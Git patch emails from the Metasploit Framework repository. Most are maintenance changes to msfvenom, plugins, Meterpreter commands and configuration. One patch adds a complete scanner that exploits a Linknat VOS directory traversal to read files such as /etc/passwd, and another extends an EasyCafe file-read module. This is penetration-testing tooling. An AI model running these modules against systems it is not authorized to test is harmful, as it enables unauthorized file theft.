valid: payloads, encoders, nops, all" - end +if generator_opts[:list] + generator_opts[:list].each do |mod| + case mod.downcase + when "payloads", "payload", "p" + $stdout.puts dump_payloads + when "encoders", "encoder", "e" + $stdout.puts dump_encoders(generator_opts[:arch]) + when "nops", "nop", "n" + $stdout.puts dump_nops + when "all" + # Init here so #dump_payloads doesn't create a framework with + # only payloads, etc. + init_framework + $stdout.puts dump_payloads + $stdout.puts dump_encoders + $stdout.puts dump_nops + else + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end - exit(0) + end + exit(0) +end + +if generator_opts[:list_options] + payload_mod = framework.payloads.create(generator_opts[:payload]) + + if payload_mod.nil? + $stderr.puts "Invalid payload: #{generator_opts[:payload]}" + exit end - if generator_opts[:list_options] - payload_mod = framework.payloads.create(generator_opts[:payload]) + $stderr.puts "Options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') - if payload_mod.nil? - $stderr.puts "Invalid payload: #{generator_opts[:payload]}" - exit - end + $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "Options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') + $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') + exit(0) +end - $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') +generator_opts[:framework] = framework +generator_opts[:cli] = true - $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') - exit(0) - end +begin + venom_generator = Msf::PayloadGenerator.new(generator_opts) + payload = venom_generator.generate_payload +rescue ::Exception => e + elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") + $stderr.puts "Error: #{e.message}" +end - generator_opts[:framework] = framework - generator_opts[:cli] = true +# No payload generated, no point to go on +exit(2) unless payload +if generator_opts[:out] begin - venom_generator = Msf::PayloadGenerator.new(generator_opts) - payload = venom_generator.generate_payload + ::File.open(generator_opts[:out], 'wb') do |f| + f.write(payload) + end + $stderr.puts "Saved as: #{generator_opts[:out]}" rescue ::Exception => e + # If I can't save it, then I can't save it. I don't think it matters what error. elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") $stderr.puts "Error: #{e.message}" end - - # No payload generated, no point to go on - exit(2) unless payload - - if generator_opts[:out] - begin - ::File.open(generator_opts[:out], 'wb') do |f| - f.write(payload) - end - $stderr.puts "Saved as: #{generator_opts[:out]}" - rescue ::Exception => e - # If I can't save it, then I can't save it. I don't think it matters what error. - elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") - $stderr.puts "Error: #{e.message}" - end - else - output_stream = $stdout - output_stream.binmode - output_stream.write payload - # trailing newline for pretty output - $stderr.puts unless payload =~ /\n$/ - end - +else + output_stream = $stdout + output_stream.binmode + output_stream.write payload + # trailing newline for pretty output + $stderr.puts unless payload =~ /\n$/ end From 93cc7d58baf76bceaf19f16721ca847292d65373 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 12 Feb 2016 15:38:50 -0800 Subject: [PATCH 321/686] Bump version of framework to 4.11.11 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 32690ca571..4cf7c7588b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.10) + metasploit-framework (4.11.11) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 68443720c0..a5241a7344 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.10" + VERSION = "4.11.11" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 95da0314294cbb5aa6d4f671501f0a2e43d5ef40 Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Sat, 13 Feb 2016 14:45:25 -0500 Subject: [PATCH 322/686] Remove vestigial conditional - thx Egypt --- plugins/nessus.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 97c67cb981..4f6f14245e 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -487,9 +487,7 @@ module Msf return end end - if args[0] == "-h" - end if !nessus_verify_token return end From 2b24e8363e9858422c02531127297de802436b03 Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Sat, 13 Feb 2016 15:36:04 -0500 Subject: [PATCH 323/686] Fix nessus_family_list The list must be iterated from the families key, or it will raise a type error. --- plugins/nessus.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 4f6f14245e..59833f0411 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -1481,7 +1481,7 @@ module Msf 'Family Name', 'Number of Plugins' ]) - list.each { |family| + list['families'].each { |family| tbl << [ family["id"], family["name"], family["count"] ] } print_line From c9c4f49aca744113448ecdf4b6b6fa9dca5b32a5 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Sat, 13 Feb 2016 17:20:37 -0500 Subject: [PATCH 324/686] Add get_file method and parse the server response --- .../misc/easycafe_server_fileaccess.rb | 41 ++++++++++++------- 1 file changed, 26 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb index 57bc0754d5..64bfb18cfb 100644 --- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -43,6 +43,28 @@ class Metasploit4 < Msf::Auxiliary ], self.class) end + def get_file + res = sock.get_once + unless res + print_error("#{peer} - Unable to retrieve file due to a timeout.") + return + end + + unless res.length == 261 + print_error("#{peer} - Received a response of an invalid size.") + return + end + + file_size = res.unpack('@256V')[0] + contents = '' + while contents.length < file_size + contents << sock.get_once + end + + print_status("#{peer} - File retrieved successfully (#{contents.length} bytes)!") + contents + end + def run_host(ip) file_path = datastore['FILEPATH'] if file_path.length > 67 @@ -58,22 +80,11 @@ class Metasploit4 < Msf::Auxiliary vprint_status("#{peer} - Sending request (#{packet.length} bytes)") connect sock.put(packet) - res = sock.get - disconnect - unless res - print_error("#{peer} - Unable to retrieve file due to a timeout.") - return - end - vprint_status("#{peer} - Received response (#{res.length} bytes)") - # Extract file contents - # Content begins after \x00\x01 - contents = res.sub(/\A.*?\x00\x01/m, '').to_s - if contents.nil? || contents.empty? - print_error("#{peer} - Unexpected reply. Unable to extract contents") - return - end - print_status("#{peer} - File retrieved successfully (#{contents.length} bytes)!") + contents = get_file + disconnect + return if contents.nil? + path = store_loot( 'easycafe_server', 'application/octet-stream', From 5c92076a1eca6913a3bbe85eb7621827f385665b Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Sun, 14 Feb 2016 09:15:25 +0000 Subject: [PATCH 325/686] more cleanup --- modules/post/multi/manage/set_wallpaper.rb | 35 ++++++++++------------ 1 file changed, 16 insertions(+), 19 deletions(-) diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index daf8cf0b58..926e219f74 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -14,12 +14,13 @@ class Metasploit3 < Msf::Post super( update_info( info, 'Name' => 'Multi Manage Set Wallpaper', 'Description' => %q{ - This module will sets the desktop wallpaper background on the specified session. + This module will set the desktop wallpaper background on the specified session. + The method of setting the wallpaper depends on the session type. }, 'License' => MSF_LICENSE, 'Author' => [ 'timwr'], 'Platform' => [ 'win', 'osx', 'linux', 'android' ], - 'SessionTypes' => [ 'shell', 'meterpreter' ] + 'SessionTypes' => [ 'meterpreter' ] )) register_options( @@ -28,6 +29,16 @@ class Metasploit3 < Msf::Post ], self.class) end + def upload_wallpaper(tempdir) + wallpaper_file = datastore["WALLPAPER_FILE"] + remote_file = "#{tempdir}#{File.basename(wallpaper_file)}" + print_status("#{peer} - Uploading to #{remote_file}") + localfile = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } + write_file(remote_file, localfile) + print_status("#{peer} - Uploaded to #{remote_file}") + remote_file + end + # # The OSX version uses an apple script to do this # @@ -48,23 +59,12 @@ class Metasploit3 < Msf::Post def win_set_wallpaper(id) remote_file = upload_wallpaper("%TEMP%\\") client.railgun.user32.SystemParametersInfoA(0x0014,nil,remote_file,0x2) - - #target_key = "HKEY_CURRENT_USER\\Control Panel\\Desktop" - #registry_createkey(target_key) - #registry_setvaldata(target_key, "Wallpaper", remotefile, 'REG_SZ') true end - def upload_wallpaper(tempdir) - wallpaper_file = datastore["WALLPAPER_FILE"] - remote_file = "#{tempdir}#{File.basename(wallpaper_file)}" - print_status("#{peer} - Uploading to #{remote_file}") - localfile = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } - write_file(remote_file, localfile) - print_status("#{peer} - Uploaded to #{remote_file}") - remote_file - end - + # + # The Android version uses the set_wallpaper command + # def android_set_wallpaper(id) wallpaper_file = datastore["WALLPAPER_FILE"] local_file = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } @@ -80,9 +80,6 @@ class Metasploit3 < Msf::Post win_set_wallpaper(id) when /android/ android_set_wallpaper(id) - else - remote_file = upload_wallpaper("/tmp/") - cmd_exec("gsettings set org.gnome.desktop.background picture-uri file://#{remote_file}") end end From 3416a24dda8e9f3be3fe9f07d1f89e8a3425abd1 Mon Sep 17 00:00:00 2001 From: Nicholas Starke <starke.nicholas@gmail.com> Date: Sun, 14 Feb 2016 11:19:20 -0600 Subject: [PATCH 326/686] Adding vprint_status for loot path Adding a vprint_status to show users the loot path as per a comment on the pull request. --- modules/auxiliary/gather/apache_karaf_command_execution.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index f04817528c..80aa453541 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary "text/plain", ip, output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") else print_error "#{ip}:#{rport} - Command failed to execute" end From f35230b908395e88aae551ce652aba65fdaa0391 Mon Sep 17 00:00:00 2001 From: nixawk <hap.ddup@gmail.com> Date: Mon, 15 Feb 2016 12:39:40 +0800 Subject: [PATCH 327/686] add Linknat Vos Manager Traversal --- .../scanner/http/linknat_vos_traversal.rb | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100755 modules/auxiliary/scanner/http/linknat_vos_traversal.rb diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb new file mode 100755 index 0000000000..668cfc4337 --- /dev/null +++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linknat Vos Manager Traversal', + 'Description' => %q( + This module attempts to test whether a file traversal vulnerability + is present in version of linknat vos2009/vos3000 + ), + 'References' => [ + ['URL', 'http://www.linknat.com/'], + ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458'] + ], + 'Author' => ['Nixawk'], + 'License' => MSF_LICENSE)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']), + OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), + OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5]) + ], self.class) + end + + def vos_uri(path) + full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}" + end + + def vos_version + case target_uri.to_s + when /chs/i + js_uri = vos_uri('js/lang_zh_cn.js') + when /cht/i + js_uri = vos_uri('js/lang_zh_tw.js') + when /eng/i + js_uri = vos_uri('js/lang_en_us.js') + else + print_warning("#{full_uri} - Please identify VOS version manually") + return + end + + res = send_request_cgi('uri' => js_uri) + return unless res + + vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}") + + return unless res.code == 200 + res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil + res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil + "#{major} #{minor}" + end + + def run_host(ip) + version = vos_version + unless version + print_error("#{full_uri} - Failed to identify Linknat VOS") + return + end + + traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH'] + filename = datastore['FILEPATH'] + + uri = normalize_uri(target_uri.path, '..', traversal, filename) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri + ) + + if res && res.code == 200 + path = store_loot( + version, + 'text/plain', + ip, + res.body, + filename) + print_good("#{full_uri} - File saved in: #{path}") + else + print_error("#{full_uri} - Nothing was downloaded") + end + end +end From 7ca0255ea1a4a9989e0869ccd501a725523fbdd4 Mon Sep 17 00:00:00 2001 From: nixawk <hap.ddup@gmail.com> Date: Mon, 15 Feb 2016 12:57:43 +0800 Subject: [PATCH 328/686] Module should not be marked executable --- modules/auxiliary/scanner/http/linknat_vos_traversal.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100755 => 100644 modules/auxiliary/scanner/http/linknat_vos_traversal.rb diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb old mode 100755 new mode 100644 From 59bf850bb0bcb5452c52ae357bac60b8bfbc4d74 Mon Sep 17 00:00:00 2001 From: Artem <artem0.umerov@yandex.ru> Date: Wed, 10 Feb 2016 17:23:00 +0300 Subject: [PATCH 329/686] Update android.rb Add request for Ringer Mode Changer --- lib/rex/post/meterpreter/extensions/android/android.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 800204d726..a19a850b78 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -71,6 +71,12 @@ class Android < Extension response = client.send_request(request) response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value end + + def set_audio_mode(n) + request = Packet.create_request('set_audio_mode') + request.add_tlv(TLV_TYPE_AUDIO_MODE, n) + response = client.send_request(request) + end def interval_collect(opts) request = Packet.create_request('interval_collect') From 2fddf333ed752c664814a22ef3a41ceb377fee1c Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Mon, 15 Feb 2016 15:04:15 -0600 Subject: [PATCH 330/686] add TLV entry --- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index babbec853a..c0dd5ce58e 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -75,6 +75,7 @@ TLV_TYPE_CELL_BASE_LAT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9072) TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) +TLV_TYPE_AUDIO_MODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9075) TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) From c5469be59ec66ad43ec67365feaaa3148dac6369 Mon Sep 17 00:00:00 2001 From: Artem <artem0.umerov@yandex.ru> Date: Wed, 10 Feb 2016 17:20:13 +0300 Subject: [PATCH 331/686] Add Android ringer change mode command --- .../ui/console/command_dispatcher/android.rb | 29 +++++++++++++++++-- 1 file changed, 27 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 4c6e39e4f4..d472a5c3c2 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -31,6 +31,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => 'Get current lat-long using WLAN information', 'interval_collect' => 'Manage interval collection capabilities', 'activity_start' => 'Start an Android activity from a Uri string' + 'set_audio_mode' => 'Set Ringer Mode' } reqs = { @@ -44,6 +45,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => ['wlan_geolocate'], 'interval_collect' => ['interval_collect'], 'activity_start' => ['activity_start'] + 'set_audio_mode' => ['set_audio_mode'] } # Ensure any requirements of the command are met @@ -153,6 +155,29 @@ class Console::CommandDispatcher::Android end end + def cmd_set_audio_mode(*args) + mode = 1 + set_audio_mode_opts = Rex::Parser::Arguments.new( + '-h' => [ false, "Help Banner" ], + '-m' => [ true, "Set Mode - ( 0 - OFF, 1 - Normal) (Default: '#{mode}')"] + ) + + set_audio_mode_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + print_line('Usage: set_audio_mode [options]') + print_line('Set Ringer mode.') + print_line(set_audio_mode_opts.usage) + return + when '-m' + mode = val.to_i + end + end + + client.android.set_audio_mode(mode) + print_status("Chenged Mode!") + end + def cmd_dump_sms(*args) path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_sms_opts = Rex::Parser::Arguments.new( @@ -536,7 +561,7 @@ class Console::CommandDispatcher::Android print_line("Start an Android activity from a uri") return end - + uri = args[0] result = client.android.activity_start(uri) if result.nil? @@ -545,7 +570,7 @@ class Console::CommandDispatcher::Android print_error("Error: #{result}") end end - + # # Name for this dispatcher # From 1f58ad15ace7ebff4d03a786cfc2f8c1c8a7085e Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Mon, 15 Feb 2016 16:21:24 -0600 Subject: [PATCH 332/686] Browser::Exploit::Server needs to have vprint* --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1ad7cffa70..1f6da0ecf5 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -7,6 +7,7 @@ require 'set' require 'rex/exploitation/js' require 'msf/core/exploit/jsobfu' require 'msf/core/exploit/remote/browser_profile_manager' +require 'msf/core/module' ### # @@ -28,6 +29,8 @@ module Msf include Msf::Exploit::RopDb include Msf::Exploit::JSObfu include Msf::Exploit::Remote::BrowserProfileManager + include Msf::Module::UI::Line::Verbose + include Msf::Module::UI::Message::Verbose # this must be static between runs, otherwise the older cookies will be ignored DEFAULT_COOKIE_NAME = '__ua' @@ -136,7 +139,6 @@ module Msf clear_browser_profiles unless self.datastore['BrowserProfilePrefix'] end - # Returns the custom 404 URL set by the user # # @return [String] From ffce1cc3218a3a1ac43924fb116426f15aefcd0e Mon Sep 17 00:00:00 2001 From: Starwarsfan2099 <starwarsfan2099@gmail.com> Date: Mon, 15 Feb 2016 22:43:28 -0500 Subject: [PATCH 333/686] Update easyfilesharing_seh.rb --- modules/exploits/windows/http/easyfilesharing_seh.rb | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/modules/exploits/windows/http/easyfilesharing_seh.rb b/modules/exploits/windows/http/easyfilesharing_seh.rb index 0b0df415b2..56e8b7f0f2 100644 --- a/modules/exploits/windows/http/easyfilesharing_seh.rb +++ b/modules/exploits/windows/http/easyfilesharing_seh.rb @@ -44,18 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) end - def check - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri('/') - }) - if res.to_s.include?('Server: Easy File Sharing Web Server v7.2') - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Unknown - end - end - def exploit connect print_status("Generating Shell Code") From 1263a82d1e77ece79ef791fd8b2dc20f8861a8d4 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Tue, 16 Feb 2016 09:12:34 -0600 Subject: [PATCH 334/686] update database.yml.example to be something reasonable --- config/database.yml.example | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/config/database.yml.example b/config/database.yml.example index 060dd23625..b04aede6b0 100644 --- a/config/database.yml.example +++ b/config/database.yml.example @@ -1,9 +1,9 @@ -# Please only use postgresql bound to a TCP port. -# Only postgresql is supportable for metasploit-framework -# these days. (No SQLite, no MySQL). -# # To set up a metasploit database, follow the directions hosted at: # http://r-7.co/MSF-DEV#set-up-postgresql +# +# Kali Linux and the Omnibus installers both include an easy wrapper script for +# managing your database, which may be more convenient than rolling your own. + development: &pgsql adapter: postgresql database: metasploit_framework_development @@ -11,7 +11,7 @@ development: &pgsql password: __________________________________ host: localhost port: 5432 - pool: 5 + pool: 200 timeout: 5 # You will often want to seperate your databases between dev From 35e0a433eaca11ab416158ed7d14d1b8d2960a9e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 16 Feb 2016 14:45:00 -0600 Subject: [PATCH 335/686] Make error output more useful --- lib/msf/ui/console/command_dispatcher/core.rb | 60 +++++++++---------- 1 file changed, 27 insertions(+), 33 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a05d06080f..a6165c2bbb 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1306,12 +1306,12 @@ class Core return false end - arg = args.shift - case arg + action = args.shift + case action when "add", "remove", "del" if (args.length < 3) - print_error("Missing arguments to route #{arg}.") + print_error("Missing arguments to route #{action}.") return false end @@ -1326,44 +1326,38 @@ class Core return false end - gw = nil + gateway_name = args.pop - # Satisfy case problems - args[2] = "Local" if (args[2] =~ /local/i) + gateway = nil - begin - # If the supplied gateway is a global Comm, use it. - if (Rex::Socket::Comm.const_defined?(args[2])) - gw = Rex::Socket::Comm.const_get(args[2]) + case gateway_name + when /local/i + gateway = Rex::Socket::Comm::Local + when /^[0-9]+$/ + session = framework.sessions.get(gateway_name) + if session.kind_of?(Msf::Session::Comm) + gateway = session + elsif session.nil? + print_error("Not a session: #{gateway_name}") + return false + else + print_error("Cannout route through specified session (not a Comm)") + return false end - rescue NameError - end - - # If we still don't have a gateway, check if it's a session. - if ((gw == nil) and - (session = framework.sessions.get(args[2])) and - (session.kind_of?(Msf::Session::Comm))) - gw = session - elsif (gw == nil) - print_error("Invalid gateway specified.") + else + print_error("Invalid gateway") return false end - if arg == "remove" or arg == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gw) - if worked - print_status("Route removed") - else - print_error("Route not found") - end + msg = "Route " + if action == "remove" or action == "del" + worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gateway) + msg << worked ? "removed" : "not found" else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gw) - if worked - print_status("Route added") - else - print_error("Route already exists") - end + worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gateway) + msg << worked ? "added" : "already exists" end + print_status(msg) when "get" if (args.length == 0) From b0cfb4aacf724477eb5e83a369d0d54921a5556e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 16 Feb 2016 22:44:03 -0600 Subject: [PATCH 336/686] Add info -d to show module documentation in .md --- Gemfile | 2 + Gemfile.lock | 20 +- data/markdown.css | 233 ++++++++++++++ lib/msf/ui/console/command_dispatcher/core.rb | 16 +- lib/msf/util/document_generator.rb | 285 ++++++++++++++++++ 5 files changed, 550 insertions(+), 6 deletions(-) create mode 100644 data/markdown.css create mode 100644 lib/msf/util/document_generator.rb diff --git a/Gemfile b/Gemfile index 9893680a4d..49f7bad8ae 100755 --- a/Gemfile +++ b/Gemfile @@ -18,6 +18,8 @@ group :development do gem 'yard' # for development and testing purposes gem 'pry' + # module documentation + gem 'octokit', '~> 4.0' end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..ed54bee260 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -57,9 +57,10 @@ GEM multi_json (~> 1.3) thread_safe (~> 0.1) tzinfo (~> 0.3.37) + addressable (2.3.8) arel (4.0.2) - arel-helpers (2.1.1) - activerecord (= 4.0.13) + arel-helpers (2.2.0) + activerecord (>= 3.1.0, < 5) aruba (0.6.2) childprocess (>= 0.3.6) cucumber (>= 1.1.1) @@ -95,6 +96,8 @@ GEM factory_girl_rails (4.5.0) factory_girl (~> 4.5.0) railties (>= 3.0.0) + faraday (0.9.2) + multipart-post (>= 1.2, < 3) ffi (1.9.8) filesize (0.1.1) fivemat (1.3.2) @@ -139,17 +142,20 @@ GEM mime-types (2.6.1) mini_portile2 (2.0.0) minitest (4.7.5) - msgpack (0.7.1) + msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) + multipart-post (2.0.0) network_interface (0.0.1) nokogiri (1.6.7.2) mini_portile2 (~> 2.0.0.rc2) + octokit (4.2.0) + sawyer (~> 0.6.0, >= 0.5.3) openssl-ccm (1.2.1) packetfu (1.1.11) network_interface (~> 0.0) pcaprub (~> 0.12) - pcaprub (0.12.0) + pcaprub (0.12.1) pg (0.18.4) pg_array_parser (0.0.9) postgres_ext (2.4.1) @@ -200,8 +206,11 @@ GEM rspec-mocks (~> 3.3.0) rspec-support (~> 3.3.0) rspec-support (3.3.0) - rubyntlm (0.5.2) + rubyntlm (0.6.0) rubyzip (1.1.7) + sawyer (0.6.0) + addressable (~> 2.3.5) + faraday (~> 0.8, < 0.10) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) simplecov (0.9.2) @@ -238,6 +247,7 @@ DEPENDENCIES factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) metasploit-framework! + octokit (~> 4.0) pry rake (>= 10.0.0) redcarpet diff --git a/data/markdown.css b/data/markdown.css new file mode 100644 index 0000000000..8bad383d05 --- /dev/null +++ b/data/markdown.css @@ -0,0 +1,233 @@ +h1, +h2, +h3, +h4, +h5, +h6, +p, +blockquote { + margin: 0; + padding: 0; +} +body { + font-family: "Helvetica Neue", Helvetica, "Hiragino Sans GB", Arial, sans-serif; + font-size: 13px; + line-height: 18px; + color: #737373; + margin: 10px 13px 10px 13px; +} +a { + color: #0069d6; +} +a:hover { + color: #0050a3; + text-decoration: none; +} +a img { + border: none; +} +p { + margin-bottom: 9px; +} +h1, +h2, +h3, +h4, +h5, +h6 { + color: #404040; + line-height: 36px; +} +h1 { + margin-bottom: 18px; + font-size: 30px; +} +h2 { + font-size: 24px; +} +h3 { + font-size: 18px; +} +h4 { + font-size: 16px; +} +h5 { + font-size: 14px; +} +h6 { + font-size: 13px; +} +hr { + margin: 0 0 19px; + border: 0; + border-bottom: 1px solid #ccc; +} +blockquote { + padding: 13px 13px 21px 15px; + margin-bottom: 18px; + font-family:georgia,serif; + font-style: italic; +} +blockquote:before { + content:"\201C"; + font-size:40px; + margin-left:-10px; + font-family:georgia,serif; + color:#eee; +} +blockquote p { + font-size: 14px; + font-weight: 300; + line-height: 18px; + margin-bottom: 0; + font-style: italic; +} +code, pre { + font-family: Monaco, Andale Mono, Courier New, monospace; +} +code { + background-color: #fee9cc; + color: rgba(0, 0, 0, 0.75); + padding: 1px 3px; + font-size: 12px; + -webkit-border-radius: 3px; + -moz-border-radius: 3px; + border-radius: 3px; +} +pre { + display: block; + padding: 14px; + margin: 0 0 18px; + line-height: 16px; + font-size: 11px; + border: 1px solid #d9d9d9; + white-space: pre-wrap; + word-wrap: break-word; +} +pre code { + background-color: #fff; + color:#737373; + font-size: 11px; + padding: 0; +} +@media screen and (min-width: 768px) { + body { + width: 748px; + margin:10px auto; + } +} + + +/* +Description: Foundation 4 docs style for highlight.js +Author: Dan Allen <dan.j.allen@gmail.com> +Website: http://foundation.zurb.com/docs/ +Version: 1.0 +Date: 2013-04-02 +*/ + +pre code { + display: block; padding: 0.5em; + background: #eee; +} + +pre .decorator, +pre .annotation { + color: #000077; +} + +pre .attribute { + color: #070; 